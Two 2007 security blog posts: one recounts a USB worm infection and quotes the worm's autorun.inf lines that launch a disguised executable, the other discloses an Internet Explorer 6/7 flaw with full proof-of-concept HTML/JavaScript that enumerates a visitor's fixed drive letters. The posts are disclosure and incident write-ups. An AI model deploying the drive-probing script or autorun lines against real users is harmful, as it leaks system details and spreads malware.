Tuesday, July 24, 2007

Is it that easy to write desktop worms?

Some days ago, a friend of mine wanted few documents from me. So I plugged his pen-drive into the USB slot. As the next obvious step, I opened the drive. And strange things started happening on my computer.


First of all, I saw an executable file with its icon similar to that of a normal directory. The name of which was MicrosoftPowerPoint.exe. Note that I noticed the extension because luckily I keep the 'Hide extensions for known file types' option off. Another reason why I noticed this was because I had 'Show all files' and 'Show system files' options on.


Next, I saw an alert with some strange text on it. Now this was clearly a sign of my computer being infected with some evil code.I quickly opened the pen-drive in explorer and noticed an Autorun.inf file! Now this was the root cause of the whole problem.

It contained the following lines

open=MicrosoftPowerPoint.exe

shellexecute=MicrosoftPowerPoint.exe

shell\Auto\command=MicrosoftPowerPoint.exe


Clearly, as soon as you/system opened the drive, the executable ran silently and did all the work. When I deleted the inf file and the exe file from the drive, it appeared again. Clearly a sign of something resident in memory.

Fortunately (?), the alert popped up again, and thus I was able to locate the exact process which was carrying out the whole operation.It was svchost. Now under normal circumstances, you see multiple instances of it in the task manager. The thing different about this one though was that it ran with user equal to my user name. I quickly killed the process, and deleted the two evil files on the pen drive.


As I had suspected, on rebooting my computer the alerts were seen again. Then after looking at the registry, I figured out that the worm had created a start-up entry on the system. It had copied itself at c:\heap41a.


On searching the internet for heap41a, I found the whole description of the worm.


Lessons learnt:

  1. Pen drives are dangerous!
  2. Never login as privileged user when running such devices.
  3. Never trust your antivirus (I have free edition of AVG fully updated).
  4. Inf files are 'BAD'.
  5. Propogating such worms is as easy as spreading ajax worms (? Any thoughts)

Luckily, the worm did not do anything evil I suppose. But you may not get so lucky.

Posted by Kishor at 12:22 AM 3 comments

Thursday, July 05, 2007

IE - Guessing The Names Of The Fixed Drives On Your Computer

DEMO

While doing experiments with IE I observed another weird behavior. When I created an anchor tag with href="a:crap" like this, in the progress bar at the bottom IE showed "file:///a:crap". Now this is interesting. How could IE even try to guess the protocol unnecessarily?
I went ahead with a new experiment: created iframes with src = a:crap. This time a 'page could not be displayed' error message.

Accidentally, I tried c:crap, and this time I saw a blank frame. Now I realized that something was special about c:

An onerror handler did not tell me whether frame was blank or an error page. So next thing was to try to read the content of the window. On reading the error page frame, I got an exception. But on c: frame which was blank, no exception was observed.

Then after brute-forcing the first 26 alphabets it was observed that only few drive names are passing the test. The floppy drives and CD drives also threw exceptions. And then enumerating all drive letters was simple.


Here is the source:



<html>
<head>
<title>Determining Fixed Hard Drives On Your Computer</title>
<style type="text/css">iframe{width: "30";height: "20";}</style>
<script>
var cnt = 0, result='';
var drives = [];
for (var j=0;j<26;j++)
{
 drives[j] = String.fromCharCode(j+97);
}
function loaded(f)
{
 cnt++;
 if(cnt == 26)
 {
   allFramesLoaded();
   alert('You have the following Fixed Drives : \n' + result.toUpperCase());
 }
}
function allFramesLoaded()
{
 for (var i=0; i<26; i++)
 {
   try{
  var k=window.frames[i].document;
  result = result + drives[i] + ",";
   }
   catch(e)
   {
   }
 }
}
function addIFrames()
{
   if(document.location.href.indexOf('test=true')<0)
  return;
for(var j=0; j<26; j++)
{
  var f = document.createElement("iframe");
  f.attachEvent('onload', loaded);
  f.src = drives[j] + ':' + 'crap';
  document.body.appendChild(f);
}
}
</script>
</head>
<body onload='addIFrames()'></body>
</html>


(Demo hosted by Mario)

Tested on IE 6/7

Posted by Kishor at 10:34 AM 3 comments
Subscribe to: Posts (Atom)